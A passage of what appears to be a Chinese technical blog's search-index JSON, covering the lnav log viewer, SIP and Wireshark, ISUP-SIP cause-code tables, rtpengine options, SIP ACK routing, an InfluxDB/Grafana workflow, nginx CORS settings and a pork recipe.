命令安装这个命令。\n在我的4C8G的Macbook Pro上,打开一个2.8G的日志文件到渲染出现,需要花费约40s,平均每秒载入超过70MB。载入日志和渲染时,使用了接近100%的CPU。渲染完毕,使用1.2G的内存空间。\n总之呢,这个工具载入日志的速度很快。但是最好不要再生产环境上使用这个命令载入过大的日志文件,否则可能造成系统资源消耗太大的问题。\n在载入2.8G的日志文件后(3200多万行),过滤时显得非常卡顿,但是查看日志并不卡顿。\n在lnav的搜索关键字,下次打开其他日志时,lnav会自动搜索这个关键词。这是它的Session记录功能,可以使用Ctrl+R重置Session。\nlnav的特点\n语法高亮 各种过滤条件 多关键词过滤 各种快捷跳转 自带统计和可视化功能,比如使用条形图展示单位时间内的报错和日志数量 自动日志格式检查。支持很多种日志格式 能够按照时间去过滤日志 TAB自动补全 实时操作 支持SQL语法查日志 支持文件导出成其他格式 支持直接打开tar.gz等压缩后的日志文件 支持很多快捷键 x下面是按天的日志统计,灰色是普通日志,黄色是告警日志,红色的错误日志。三种颜色叠加的长度就是总日志。时间跨度单位也是可以调节的。最大跨度是一天,最短跨度是1秒。\n仍然是日志格式 自动日志格式检测 系统日志 Web服务器访问日志 报错日志 等等 过滤 可以设置多个过滤规则 时间线过滤 精确时间的日志 上个小时,下个小时 上一分钟,下一分钟 能够按照时间去追踪日志\n按照时间周期统计 统计每秒出现的错误,告警和总日志的量 语法高亮 Tab键自动补全 参考 https://lnav.readthedocs.io/en/latest/ 如果你更喜欢GUI工具,那也可以试试https://github.com/nickbnf/glogg 后记 最近因为工作需要,每天都会去排查很多的日志文件。我也曾想过装ELK之类的工具,但是我收到是文件。日志文件要转存到ELK中也要花功夫。另外ELK也是非常耗费资源的。ELK部署到一半我就果断放弃了。\n与其南辕北辙,不如回归本质。找些命令行的小工具直接分析日志文件。\n","permalink":"https://wdd.js.org/posts/2020/03/wikbh8/","summary":"lnav, 不需要服务端,不需要设置,仍然功能强大到没有朋友。\n速度与性能 lnav是一个可以运行在终端上的日志分析工具。功能非常强大,如果grep和tail等命令无法满足你的需求,或许你可以尝试一下lnav。\nlnav的官方仓库是https://github.com/tstack/lnav,在mac上可以使用 brew install lnav 命令安装这个命令。\n在我的4C8G的Macbook Pro上,打开一个2.8G的日志文件到渲染出现,需要花费约40s,平均每秒载入超过70MB。载入日志和渲染时,使用了接近100%的CPU。渲染完毕,使用1.2G的内存空间。\n总之呢,这个工具载入日志的速度很快。但是最好不要再生产环境上使用这个命令载入过大的日志文件,否则可能造成系统资源消耗太大的问题。\n在载入2.8G的日志文件后(3200多万行),过滤时显得非常卡顿,但是查看日志并不卡顿。\n在lnav的搜索关键字,下次打开其他日志时,lnav会自动搜索这个关键词。这是它的Session记录功能,可以使用Ctrl+R重置Session。\nlnav的特点\n语法高亮 各种过滤条件 多关键词过滤 各种快捷跳转 自带统计和可视化功能,比如使用条形图展示单位时间内的报错和日志数量 自动日志格式检查。支持很多种日志格式 能够按照时间去过滤日志 TAB自动补全 实时操作 支持SQL语法查日志 支持文件导出成其他格式 支持直接打开tar.gz等压缩后的日志文件 支持很多快捷键 x下面是按天的日志统计,灰色是普通日志,黄色是告警日志,红色的错误日志。三种颜色叠加的长度就是总日志。时间跨度单位也是可以调节的。最大跨度是一天,最短跨度是1秒。\n仍然是日志格式 自动日志格式检测 系统日志 Web服务器访问日志 报错日志 等等 过滤 可以设置多个过滤规则 时间线过滤 精确时间的日志 上个小时,下个小时 上一分钟,下一分钟 能够按照时间去追踪日志\n按照时间周期统计 统计每秒出现的错误,告警和总日志的量 语法高亮 Tab键自动补全 参考 https://lnav.readthedocs.io/en/latest/ 如果你更喜欢GUI工具,那也可以试试https://github.com/nickbnf/glogg 后记 
最近因为工作需要,每天都会去排查很多的日志文件。我也曾想过装ELK之类的工具,但是我收到是文件。日志文件要转存到ELK中也要花功夫。另外ELK也是非常耗费资源的。ELK部署到一半我就果断放弃了。\n与其南辕北辙,不如回归本质。找些命令行的小工具直接分析日志文件。","title":"命令行日志查看神器:lnav"},{"content":"图解包在TCP/IP各个协议栈的流动情况\n点击查看【undefined】\n","permalink":"https://wdd.js.org/network/mlepcg/","summary":"图解包在TCP/IP各个协议栈的流动情况\n点击查看【undefined】","title":"网络包的封装和分用"},{"content":"1. 打开wireshark,并选择网卡 在过滤条件中输入sip 2. 选择电话-\u0026gt; VoIP Calls 3. 选中一条呼叫记录-\u0026gt;然后点击 Flow Sequence 4. 查看消息的详情 ","permalink":"https://wdd.js.org/opensips/tools/wireshark-sip/","summary":"1. 打开wireshark,并选择网卡 在过滤条件中输入sip 2. 选择电话-\u0026gt; VoIP Calls 3. 选中一条呼叫记录-\u0026gt;然后点击 Flow Sequence 4. 查看消息的详情 ","title":"Wireshark SIP 抓包"},{"content":"IP协议格式 字段说明 Protocol 表示上层协议,也就是传输层是什么协议。\n只需要看Decimal这列,常用的有6表示TCP, 17表示UDP, 50表示ESP。\n用wireshark抓包的时候,也可以看到Protocol: UDP(17)\n参考 https://tools.ietf.org/html/rfc791 https://tools.ietf.org/html/rfc790 https://en.wikipedia.org/wiki/List_of_IP_protocol_numbers ","permalink":"https://wdd.js.org/network/ip-protocol/","summary":"IP协议格式 字段说明 Protocol 表示上层协议,也就是传输层是什么协议。\n只需要看Decimal这列,常用的有6表示TCP, 17表示UDP, 50表示ESP。\n用wireshark抓包的时候,也可以看到Protocol: UDP(17)\n参考 https://tools.ietf.org/html/rfc791 https://tools.ietf.org/html/rfc790 https://en.wikipedia.org/wiki/List_of_IP_protocol_numbers ","title":"IP协议 Protocol"},{"content":" ","permalink":"https://wdd.js.org/network/ibhy8a/","summary":" ","title":"从飞机航线讲解网络分层"},{"content":"网页上的报错,一般都会和HTTP请求出错有关。 在Chrome浏览器中,按F12或者command+option+i可以打开Dev tools,在网络面板中可以找到报错的的HTTP请求。\n通过提交Copy as cURL 和 Copy response的内容,就会非常准确的把问题报告给开发。开发也会非常快速的定位问题。\n","permalink":"https://wdd.js.org/fe/copy-as-curl-and-copy-response/","summary":"网页上的报错,一般都会和HTTP请求出错有关。 在Chrome浏览器中,按F12或者command+option+i可以打开Dev tools,在网络面板中可以找到报错的的HTTP请求。\n通过提交Copy as cURL 和 Copy response的内容,就会非常准确的把问题报告给开发。开发也会非常快速的定位问题。","title":"Copy as CURL and Copy Response"},{"content":"1. 选肉 **猪肉,肥瘦相间的五花肉才最好吃。**精瘦肉吃起来会太柴,太肥的肉会显得太腻。五花肉则刚刚好,不柴也不腻。\n2. 炒干 烧好的猪肉中如果有生水的味道,则口感不好,而且会显得肉不够熟。\n3. 
具体步骤 五花肉洗净,切片。放入干净的炒锅中,然后开火烧 将五花肉的水分烧干,并且冒油,肉面发黄 放入姜葱蒜,小米椒,加入生抽,料酒,食盐爆炒。如果猪油比较少,则可以放入适量食用油 然后可以按需加入蔬菜。例如花菜、或者芹菜、或者小青椒 炒到蔬菜9成熟,然后出锅 ","permalink":"https://wdd.js.org/posts/2020/02/edtzzx/","summary":"1. 选肉 **猪肉,肥瘦相间的五花肉才最好吃。**精瘦肉吃起来会太柴,太肥的肉会显得太腻。五花肉则刚刚好,不柴也不腻。\n2. 炒干 烧好的猪肉中如果有生水的味道,则口感不好,而且会显得肉不够熟。\n3. 具体步骤 五花肉洗净,切片。放入干净的炒锅中,然后开火烧 将五花肉的水分烧干,并且冒油,肉面发黄 放入姜葱蒜,小米椒,加入生抽,料酒,食盐爆炒。如果猪油比较少,则可以放入适量食用油 然后可以按需加入蔬菜。例如花菜、或者芹菜、或者小青椒 炒到蔬菜9成熟,然后出锅 ","title":"如何烧肉才好吃"},{"content":"ISUP to SIP ISUP Cause Value SIP Response Normal event 1 – unallocated number 404 Not Found 2 – no route to network 404 Not Found 3 – no route to destination 404 Not Found 16 – normal call clearing \u0026mdash; (*) 17 – user busy 486 Busy here 18 – no user responding 408 Request Timeout 19 – no answer from the user 480 Temporarily unavailable 20 – subscriber absent 480 Temporarily unavailable 21 – call rejected 403 Forbidden (+) 22 – number changed (s/o diagnostic) 410 Gone 23 – redirection to new destination 410 Gone 26 – non-selected user clearing 404 Not Found (=) 27 – destination out of order 502 Bad Gateway 28 – address incomplete 484 Address incomplete 29 – facility rejected 510 Not implemented 31 – normal unspecified 480 Temporarily unavailable Resource unavailable 34 – no circuit available 503 Service unavailable 38 – network out of order 503 Service unavailable 41 – temporary failure 503 Service unavailable 42 – switching equipment congestion 503 Service unavailable 47 – resource unavailable 503 Service unavailable Service or option not available 55 – incoming calls barred within CUG 403 Forbidden 57 – bearer capability not authorized 403 Forbidden 58 – bearer capability not presently available 503 Service unavailable 65 – bearer capability not implemented 488 Not Acceptable here 70 – Only restricted digital information bearer capability is available (National use) 488 Not Acceptable here 79 – service or option not implemented 501 Not implemented Invalid message 87 – user not member of CUG 403 
Forbidden 88 – incompatible destination 503 Service unavailable 102 – Call Setup Time-out Failure 504 Gateway timeout 111 – Protocol Error Unspecified 500 Server internal error Interworking 127 – Internal Error - interworking unspecified 500 Server internal error (*) ISDN Cause 16 will usually result in a BYE or CANCEL(+) If the cause location is user then the 6xx code could be given rather than the 4xx code. the cause value received in the H.225.0 message is unknown in ISUP, the unspecified cause value of the class is sent.(=) ANSI procedure SIP to ISDN Response received Cause value in the REL.\nSIP Status Code ISDN Map 400 - Bad Request 41 – Temporary failure 401 - Unauthorized 21 – Call rejected (*) 402 - Payment required 21 – Call rejected 403 - Forbidden 21 – Call rejected 404 - Not Found 1 – Unallocated number 405 - Method not allowed 63 – Service or option unavailable 406 - Not acceptable 79 – Service/option not implemented (+) 407 - Proxy authentication required 21 – Call rejected (*) 408 - Request timeout 102 – Recovery on timer expiry 410 - Gone 22 – Number changed (w/o diagnostic) 413 - Request Entity too long 127 – Interworking (+) 414 - Request –URI too long 127 – Interworking (+) 415 - Unsupported media type 79 – Service/option not implemented (+) 416 - Unsupported URI Scheme 127 – Interworking (+) 420 - Bad extension 127 – Interworking (+) 421 - Extension Required 127 – Interworking (+) 423 - Interval Too Brief 127 – Interworking (+) 480 - Temporarily unavailable 18 – No user responding 481 - Call/Transaction Does not Exist 41 – Temporary Failure 482 - Loop Detected 25 – Exchange – routing error 483 - Too many hops 25 – Exchange – routing error 484 - Address incomplete 28 – Invalid Number Format (+) 485 - Ambiguous 1 – Unallocated number 486 - Busy here 17 – User Busy 487 - Request Terminated \u0026mdash; (no mapping) 488 - Not Acceptable here \u0026mdash; by warning header 500 - Server internal error 41 – Temporary Failure 501 - Not implemented 79 – 
Not implemented, unspecified 502 - Bad gateway 38 – Network out of order 503 - Service unavailable 41 – Temporary Failure 504 - Service time-out 102 – Recovery on timer expiry 505 - Version Not supported 127 – Interworking (+) 513 - Message Too Large 127 – Interworking (+) 600 - Busy everywhere 17 – User busy 603 - Decline 21 – Call rejected 604 - Does not exist anywhere 1 – Unallocated number 606 - Not acceptable \u0026mdash; by warning header 参考 https://www.dialogic.com/webhelp/BorderNet2020/1.1.0/WebHelp/cause_code_map_ss7_sip.htm ","permalink":"https://wdd.js.org/opensips/ch9/isup-sip-isdn/","summary":"ISUP to SIP ISUP Cause Value SIP Response Normal event 1 – unallocated number 404 Not Found 2 – no route to network 404 Not Found 3 – no route to destination 404 Not Found 16 – normal call clearing \u0026mdash; (*) 17 – user busy 486 Busy here 18 – no user responding 408 Request Timeout 19 – no answer from the user 480 Temporarily unavailable 20 – subscriber absent 480 Temporarily unavailable 21 – call rejected 403 Forbidden (+) 22 – number changed (s/o diagnostic) 410 Gone 23 – redirection to new destination 410 Gone 26 – non-selected user clearing 404 Not Found (=) 27 – destination out of order 502 Bad Gateway 28 – address incomplete 484 Address incomplete 29 – facility rejected 510 Not implemented 31 – normal unspecified 480 Temporarily unavailable Resource unavailable 34 – no circuit available 503 Service unavailable 38 – network out of order 503 Service unavailable 41 – temporary failure 503 Service unavailable 42 – switching equipment congestion 503 Service unavailable 47 – resource unavailable 503 Service unavailable Service or option not available 55 – incoming calls barred within CUG 403 Forbidden 57 – bearer capability not authorized 403 Forbidden 58 – bearer capability not presently available 503 Service unavailable 65 – bearer capability not implemented 488 Not Acceptable here 70 – Only restricted digital information bearer capability is available 
(National use) 488 Not Acceptable here 79 – service or option not implemented 501 Not implemented Invalid message 87 – user not member of CUG 403 Forbidden 88 – incompatible destination 503 Service unavailable 102 – Call Setup Time-out Failure 504 Gateway timeout 111 – Protocol Error Unspecified 500 Server internal error Interworking 127 – Internal Error - interworking unspecified 500 Server internal error (*) ISDN Cause 16 will usually result in a BYE or CANCEL(+) If the cause location is user then the 6xx code could be given rather than the 4xx code.","title":"ISUP SIP ISDN对照码表"},{"content":"帮助文档 Usage: rtpengine [OPTION...] - next-generation media proxy Application Options: -v, \u0026ndash;version Print build time and exit \u0026ndash;config-file=FILE Load config from this file \u0026ndash;config-section=STRING Config file section to use \u0026ndash;log-facility=daemon|local0|\u0026hellip;|local7 Syslog facility to use for logging **-L, \u0026ndash;log-level=INT ** Mask log priorities above this level 取值从0-7, 7 debug 6 info 5 notice **-E, \u0026ndash;log-stderr ** Log on stderr instead of syslog \u0026ndash;no-log-timestamps Drop timestamps from log lines to stderr \u0026ndash;log-mark-prefix Prefix for sensitive log info \u0026ndash;log-mark-suffix Suffix for sensitive log info **-p, \u0026ndash;pidfile=FILE ** Write PID to file **-f, \u0026ndash;foreground ** Don\u0026rsquo;t fork to background -t, \u0026ndash;table=INT Kernel table to use -F, \u0026ndash;no-fallback Only start when kernel module is available **-i, \u0026ndash;interface=[NAME/]IP[!IP] ** Local interface for RTP -k, \u0026ndash;subscribe-keyspace=INT INT \u0026hellip; Subscription keyspace list -l, \u0026ndash;listen-tcp=[IP:]PORT TCP port to listen on -u, \u0026ndash;listen-udp=[IP46|HOSTNAME:]PORT UDP port to listen on -n, \u0026ndash;listen-ng=[IP46|HOSTNAME:]PORT UDP port to listen on, NG protocol **-c, \u0026ndash;listen-cli=[IP46|HOSTNAME:]PORT ** UDP port to listen on, CLI -g, 
\u0026ndash;graphite=IP46|HOSTNAME:PORT Address of the graphite server -G, \u0026ndash;graphite-interval=INT Graphite send interval in seconds \u0026ndash;graphite-prefix=STRING Prefix for graphite line -T, \u0026ndash;tos=INT Default TOS value to set on streams \u0026ndash;control-tos=INT Default TOS value to set on control-ng -o, \u0026ndash;timeout=SECS RTP timeout -s, \u0026ndash;silent-timeout=SECS RTP timeout for muted -a, \u0026ndash;final-timeout=SECS Call timeout \u0026ndash;offer-timeout=SECS Timeout for incomplete one-sided calls **-m, \u0026ndash;port-min=INT ** Lowest port to use for RTP **-M, \u0026ndash;port-max=INT ** Highest port to use for RTP -r, \u0026ndash;redis=[PW@]IP:PORT/INT Connect to Redis database -w, \u0026ndash;redis-write=[PW@]IP:PORT/INT Connect to Redis write database \u0026ndash;redis-num-threads=INT Number of Redis restore threads \u0026ndash;redis-expires=INT Expire time in seconds for redis keys -q, \u0026ndash;no-redis-required Start no matter of redis connection state \u0026ndash;redis-allowed-errors=INT Number of allowed errors before redis is temporarily disabled \u0026ndash;redis-disable-time=INT Number of seconds redis communication is disabled because of errors \u0026ndash;redis-cmd-timeout=INT Sets a timeout in milliseconds for redis commands \u0026ndash;redis-connect-timeout=INT Sets a timeout in milliseconds for redis connections -b, \u0026ndash;b2b-url=STRING XMLRPC URL of B2B UA \u0026ndash;log-facility-cdr=daemon|local0|\u0026hellip;|local7 Syslog facility to use for logging CDRs \u0026ndash;log-facility-rtcp=daemon|local0|\u0026hellip;|local7 Syslog facility to use for logging RTCP \u0026ndash;log-facility-dtmf=daemon|local0|\u0026hellip;|local7 Syslog facility to use for logging DTMF \u0026ndash;log-format=default|parsable Log prefix format \u0026ndash;dtmf-log-dest=IP46|HOSTNAME:PORT Destination address for DTMF logging via UDP -x, \u0026ndash;xmlrpc-format=INT XMLRPC timeout request format to use. 
0: SEMS DI, 1: call-id only, 2: Kamailio \u0026ndash;num-threads=INT Number of worker threads to create \u0026ndash;media-num-threads=INT Number of worker threads for media playback -d, \u0026ndash;delete-delay=INT Delay for deleting a session from memory. \u0026ndash;sip-source Use SIP source address by default \u0026ndash;dtls-passive Always prefer DTLS passive role \u0026ndash;max-sessions=INT Limit of maximum number of sessions \u0026ndash;max-load=FLOAT Reject new sessions if load averages exceeds this value \u0026ndash;max-cpu=FLOAT Reject new sessions if CPU usage (in percent) exceeds this value \u0026ndash;max-bandwidth=INT Reject new sessions if bandwidth usage (in bytes per second) exceeds this value \u0026ndash;homer=IP46|HOSTNAME:PORT Address of Homer server for RTCP stats \u0026ndash;homer-protocol=udp|tcp Transport protocol for Homer (default udp) \u0026ndash;homer-id=INT \u0026lsquo;Capture ID\u0026rsquo; to use within the HEP protocol \u0026ndash;recording-dir=FILE Directory for storing pcap and metadata files \u0026ndash;recording-method=pcap|proc Strategy for call recording \u0026ndash;recording-format=raw|eth File format for stored pcap files \u0026ndash;iptables-chain=STRING Add explicit firewall rules to this iptables chain \u0026ndash;codecs Print a list of supported codecs and exit \u0026ndash;scheduling=default|none|fifo|rr|other|batch|idle Thread scheduling policy \u0026ndash;priority=INT Thread scheduling priority \u0026ndash;idle-scheduling=default|none|fifo|rr|other|batch|idle Idle thread scheduling policy \u0026ndash;idle-priority=INT Idle thread scheduling priority \u0026ndash;log-srtp-keys Log SRTP keys to error log \u0026ndash;mysql-host=HOST|IP MySQL host for stored media files \u0026ndash;mysql-port=INT MySQL port \u0026ndash;mysql-user=USERNAME MySQL connection credentials \u0026ndash;mysql-pass=PASSWORD MySQL connection credentials \u0026ndash;mysql-query=STRING MySQL select query 
\u0026ndash;endpoint-learning=delayed|immediate|off|heuristic RTP endpoint learning algorithm \u0026ndash;jitter-buffer=INT Size of jitter buffer \u0026ndash;jb-clock-drift Compensate for source clock drift 参考 https://github.com/sipwise/rtpengine ","permalink":"https://wdd.js.org/opensips/ch9/rtpengine-manu/","summary":"帮助文档 Usage: rtpengine [OPTION...] - next-generation media proxy Application Options: -v, \u0026ndash;version Print build time and exit \u0026ndash;config-file=FILE Load config from this file \u0026ndash;config-section=STRING Config file section to use \u0026ndash;log-facility=daemon|local0|\u0026hellip;|local7 Syslog facility to use for logging **-L, \u0026ndash;log-level=INT ** Mask log priorities above this level 取值从0-7, 7 debug 6 info 5 notice **-E, \u0026ndash;log-stderr ** Log on stderr instead of syslog \u0026ndash;no-log-timestamps Drop timestamps from log lines to stderr \u0026ndash;log-mark-prefix Prefix for sensitive log info \u0026ndash;log-mark-suffix Suffix for sensitive log info **-p, \u0026ndash;pidfile=FILE ** Write PID to file **-f, \u0026ndash;foreground ** Don\u0026rsquo;t fork to background -t, \u0026ndash;table=INT Kernel table to use -F, \u0026ndash;no-fallback Only start when kernel module is available **-i, \u0026ndash;interface=[NAME/]IP[!","title":"rtpengine"},{"content":"ACK的特点 ACK仅用于对INVITE消息的最终响应进行确认 ACK的CSeq的号码必须和INVITE的CSeq号码相同,这是用来保证ACK对哪一个INVITE进行确认的唯一标志。另外CSeq的方法会改为ACK ACK分为两种 失败请求的确认;例如对4XX, 5XX请求的确认。在对失败的请求进行确认时,ACK是逐跳的。 成功的请求的确认;对200的确认,此时ACK是端到端的。 ACK一般不会带有SDP信息。如果INVITE消息没有带有SDP,那么ACK消息中一般会带有SDP ACK与事务的关系 如果请求成功,那么后续的ACK消息是单独的事务 如果请求失败,那么后续的ACK消息和之前的INVITE是属于相同的事务 逐跳ACK VS 端到端ACK 逐跳在英文中叫做: hop-by-hop端到端在英文中叫做:end-to-end\nACK如何路由 ack是序列化请求,所谓序列化请求,是指sip to 字段中已经有tag。有to tag是到达对端的唯一标志。\n没有to tag请求称为初始化请求,有totag称为序列化请求。\n初始化请求做路径发现,往往需要做一些数据库查询,DNS查询。而序列化请求不需要查询数据库,因为路径已经发现过了。\n实战场景:分机A, SIP服务器S, 分机B, A呼叫B,详细介绍一下到ACK的过程。\n分机A向SIP服务器S发送请求:INVITE B SIP服务器 首先在数据库中查找B的实际注册地址 修改Contact头为分机A的外网地址和端口。因为由于存在NAT, 
分机A一般不知道自己的公网地址。 record_route 将消息发送给B 分机B: 收到来自SIP服务器的INVITE消息 从INVITE中取出Contact, 获取对端的,其实也就是分机A的实际地址 如果所有条件都满足,分机B会向SIP服务器发送180响应,然后发送200响应 由于180响应和200响应和INVITE都属于一个事务,响应会按照Via的地址,先发送给SIP服务器 SIP服务器: SIP服务器会首先修改180响应的Contact头,把分机B的内网地址改为外网地址 SIP服务器根据Via头,将消息发送给分机A 对于200 OK的消息,和180的处理是相同的 分机A: 分机收到180消息后,从Contact头中能够获取分机B的外网地址 分机A在发送ACK时,request url地址是分机B的地址,但是由于sip服务器的record_route动作首先会将消息发送给SIP服务器,SIP服务器会按照request url的地址,将ack发送给分机B。 ACK的路由不需要做数据库查询,ACK的request url一般是对端UAC的地址。在存在route头时,ACK会按照route字段去路由。\nACK丢失了会怎样? 如果被叫在一定时间内没有收到ACK, 那么被叫会周期性的重发200OK。如果在超时的时候,还没有收到ACK, 就会发送BYE消息来挂断呼叫。很多呼叫在30秒自动挂断,往往就是因为丢失了ACK。\n那么ACK为什么会丢失呢?可能有以下的原因,大部分原因和NAT有关!\nSIP服务器没有做fix_nat_contact, 导致主叫可能不知道实际被叫的外网地址 ACK与媒体流的关系 并不是说被叫收到ACK后,媒体流才开始。往往在180或者183时,双方已经能够听到对方的声音了。\n","permalink":"https://wdd.js.org/opensips/ch1/sip-ack/","summary":"ACK的特点 ACK仅用于对INVITE消息的最终响应进行确认 ACK的CSeq的号码必须和INVITE的CSeq号码相同,这是用来保证ACK对哪一个INVITE进行确认的唯一标志。另外CSeq的方法会改为ACK ACK分为两种 失败请求的确认;例如对4XX, 5XX请求的确认。在对失败的请求进行确认时,ACK是逐跳的。 成功的请求的确认;对200的确认,此时ACK是端到端的。 ACK一般不会带有SDP信息。如果INVITE消息没有带有SDP,那么ACK消息中一般会带有SDP ACK与事务的关系 如果请求成功,那么后续的ACK消息是单独的事务 如果请求失败,那么后续的ACK消息和之前的INVITE是属于相同的事务 逐跳ACK VS 端到端ACK 逐跳在英文中叫做: hop-by-hop端到端在英文中叫做:end-to-end\nACK如何路由 ack是序列化请求,所谓序列化请求,是指sip to 字段中已经有tag。有to tag是到达对端的唯一标志。\n没有to tag请求称为初始化请求,有totag称为序列化请求。\n初始化请求做路径发现,往往需要做一些数据库查询,DNS查询。而序列化请求不需要查询数据库,因为路径已经发现过了。\n实战场景:分机A, SIP服务器S, 分机B, A呼叫B,详细介绍一下到ACK的过程。\n分机A向SIP服务器S发送请求:INVITE B SIP服务器 首先在数据库中查找B的实际注册地址 修改Contact头为分机A的外网地址和端口。因为由于存在NAT, 分机A一般不知道自己的公网地址。 record_route 将消息发送给B 分机B: 收到来自SIP服务器的INVITE消息 从INVITE中取出Contact, 获取对端的,其实也就是分机A的实际地址 如果所有条件都满足,分机B会向SIP服务器发送180响应,然后发送200响应 由于180响应和200响应和INVITE都属于一个事务,响应会按照Via的地址,先发送给SIP服务器 SIP服务器: SIP服务器会首先修改180响应的Contact头,把分机B的内网地址改为外网地址 SIP服务器根据Via头,将消息发送给分机A 对于200 OK的消息,和180的处理是相同的 分机A: 分机收到180消息后,从Contact头中能够获取分机B的外网地址 分机A在发送ACK时,request url地址是分机B的地址,但是由于sip服务器的record_route动作首先会将消息发送给SIP服务器,SIP服务器会按照request url的地址,将ack发送给分机B。 ACK的路由不需要做数据库查询,ACK的request
url一般是对端UAC的地址。在存在route头时,ACK会按照route字段去路由。\nACK丢失了会怎样? 如果被叫在一定时间内没有收到ACK, 那么被叫会周期性的重发200OK。如果在超时的时候,还没有收到ACK, 就会发送BYE消息来挂断呼叫。很多呼叫在30秒自动挂断,往往就是因为丢失了ACK。\n那么ACK为什么会丢失呢?可能有以下的原因,大部分原因和NAT有关!\nSIP服务器没有做fix_nat_contact, 导致主叫可能不知道实际被叫的外网地址 ACK与媒体流的关系 并不是说被叫收到ACK后,媒体流才开始。往往在180或者183时,双方已经能够听到对方的声音了。","title":"深入理解SIP ACK 方法"},{"content":"数据规整 我的数据来源一般都是来自于日志文件,不同的日志文件格式可能都不相同。所以第一步就是把数据抽取出来,并且格式化。\n一般情况下我会用grep或者awk进行初步的整理。如果shell脚本处理不太方便,通常我会写个js脚本。\nNode.js的readline可以实现按行取出。处理过后的输出依然是写文件。\nconst readline = require(\u0026#39;readline\u0026#39;) const fs = require(\u0026#39;fs\u0026#39;) const dayjs = require(\u0026#39;dayjs\u0026#39;) const fileName = \u0026#39;data.log\u0026#39; const batch = dayjs().format(\u0026#39;MMDDHHmmss\u0026#39;) const dist = fs.createWriteStream(`${fileName}.out`) const rl = readline.createInterface({ input: fs.createReadStream(fileName) }) rl.on(\u0026#39;line\u0026#39;, handlerLine) function handlerLine (line) { let info = line.split(\u0026#39; \u0026#39;) let time = dayjs(`2020-${info[0]} ${info[1]}`).valueOf() let log = `rtpproxy,tag=b${batch} socket=${info[2]},mem=${info[3]} ${time}000000\\n` console.log(log) dist.write(log) } 输出的文件格式如下,至于为什么是这种格式,且看下文分晓。\nrtpproxy,tag=b0216014954 socket=691,mem=3106936 1581477499000000000 rtpproxy,tag=b0216014954 socket=615,mem=3109328 1581477648000000000 rtpproxy,tag=b0216014954 socket=669,mem=3113764 1581477901000000000 rtpproxy,tag=b0216014954 socket=701,mem=3114820 1581477961000000000 数据导入 以前我都会把数据规整后的输出写成一个JSON文件,然后写html页面,引入Echarts库,进行数据可视化。\n但是这种方式过于繁琐,每次都要写个Echarts的Options。\n所以我想,如果把数据写入influxdb,然后用grafana去做可视化,那岂不是十分方便。\n所以,我们要把数据导入influxdb。\n启动influxdb grafana 下面是一个Makefile, 用来启动容器。\nmake create-network 用来创建两个容器的网络,这样grafana就可以通过容器名访问influxdb了。 make run-influxdb 启动influxdb,其中8086端口是influxdb对外提供服务的端口 make run-grafana 启动grafana, 其中3000端口是grafana对外提供服务的端口 run-influxdb: docker run -d -p 8083:8083 -p 8086:8086 --network b2 --name influxdb influxdb:latest run-grafana: docker run -d --name grafana 
--network b2 -p 3000:3000 grafana/grafana create-network: docker network create -d bridge --ip-range=192.168.1.0/24 --gateway=192.168.1.1 --subnet=192.168.1.0/24 b2 接着你打开localhost:3000端口,输入默认的用户名密码 admin/admin来登录\n创建默认的数据库\n进入influxdb的容器中创建数据库\ndocker exec -it influxdb bash influx create database mydb grafana中添加influxdb数据源\n使用curl上传数据到influxdb\ncurl -i -XPOST \u0026#34;http://localhost:8086/write?db=mydb\u0026#34; --data-binary @data.log.out grafana上添加dashboard 结论 通过使用influxdb来存储数据,grafana来做可视化。每次需要分析的时候,我需要做的仅仅只是写个脚本去规整数据,这样就大大提高了分析效率。\n","permalink":"https://wdd.js.org/posts/2020/02/mrgkvf/","summary":"数据规整 我的数据来源一般都是来自于日志文件,不同的日志文件格式可能都不相同。所以第一步就是把数据抽取出来,并且格式化。\n一般情况下我会用grep或者awk进行初步的整理。如果shell脚本处理不太方便,通常我会写个js脚本。\nNode.js的readline可以实现按行取出。处理过后的输出依然是写文件。\nconst readline = require(\u0026#39;readline\u0026#39;) const fs = require(\u0026#39;fs\u0026#39;) const dayjs = require(\u0026#39;dayjs\u0026#39;) const fileName = \u0026#39;data.log\u0026#39; const batch = dayjs().format(\u0026#39;MMDDHHmmss\u0026#39;) const dist = fs.createWriteStream(`${fileName}.out`) const rl = readline.createInterface({ input: fs.createReadStream(fileName) }) rl.on(\u0026#39;line\u0026#39;, handlerLine) function handlerLine (line) { let info = line.split(\u0026#39; \u0026#39;) let time = dayjs(`2020-${info[0]} ${info[1]}`).valueOf() let log = `rtpproxy,tag=b${batch} socket=${info[2]},mem=${info[3]} ${time}000000\\n` console.log(log) dist.write(log) } 输出的文件格式如下,至于为什么是这种格式,且看下文分晓。\nrtpproxy,tag=b0216014954 socket=691,mem=3106936 1581477499000000000 rtpproxy,tag=b0216014954 socket=615,mem=3109328 1581477648000000000 rtpproxy,tag=b0216014954 socket=669,mem=3113764 1581477901000000000 rtpproxy,tag=b0216014954 socket=701,mem=3114820 1581477961000000000 数据导入 以前我都会把数据规整后的输出写成一个JSON文件,然后写html页面,引入Echarts库,进行数据可视化。","title":"我的数据可视化处理过程"},{"content":"特征维度 特征项 集中 
无规律 周期性 时间 集中在某个时间点发生 按固定时间间隔发生 空间 集中在某个空间发生 人物 集中在某个人物身上发生 ","title":"故障的特征分析方法"},{"content":"下文的论述都以下面的配置为例子\nlocation ^~ /p/security { rewrite /p/security/(.*) /security/$1 break; proxy_pass http://security:8080; proxy_redirect off; proxy_set_header Host $host; add_header \u0026#39;Access-Control-Allow-Origin\u0026#39; \u0026#39;*\u0026#39; always; add_header \u0026#39;Access-Control-Allow-Credentials\u0026#39; \u0026#39;true\u0026#39; always; } 如果dns无法解析,nginx则无法启动 security如果无法解析,那么nginx则无法启动 DNS缓存问题: nginx启动时,如果将security dns解析为1.2.3.4。如果security的ip地址变了。nginx不会自动解析新的ip地址,导致反向代理报错504。 反向代理的DNS缓存问题务必重视 跨域头配置的always 反向代理一般都是希望允许跨域的。如果不加always,那么只会对成功的请求加跨域头,失败的请求则不会。 关于**\u0026lsquo;Access-Control-Allow-Origin\u0026rsquo; \u0026lsquo;*\u0026rsquo;,如果后端服务本身就带有这个头,那么如果你在nginx中再添加这个头,就会在浏览器中遇到下面的报错。而解决办法就是不要在nginx中设置这个头。**\nAccess to fetch at \u0026#39;http://192.168.40.107:31088/p/security/v2/login\u0026#39; from origin \u0026#39;http://localhost:5000\u0026#39; has been blocked by CORS policy: Response to preflight request doesn\u0026#39;t pass access control check: The \u0026#39;Access-Control-Allow-Origin\u0026#39; header contains multiple values \u0026#39;*, *\u0026#39;, but only one is allowed. Have the server send the header with a valid value, or, if an opaque response serves your needs, set the request\u0026#39;s mode to \u0026#39;no-cors\u0026#39; 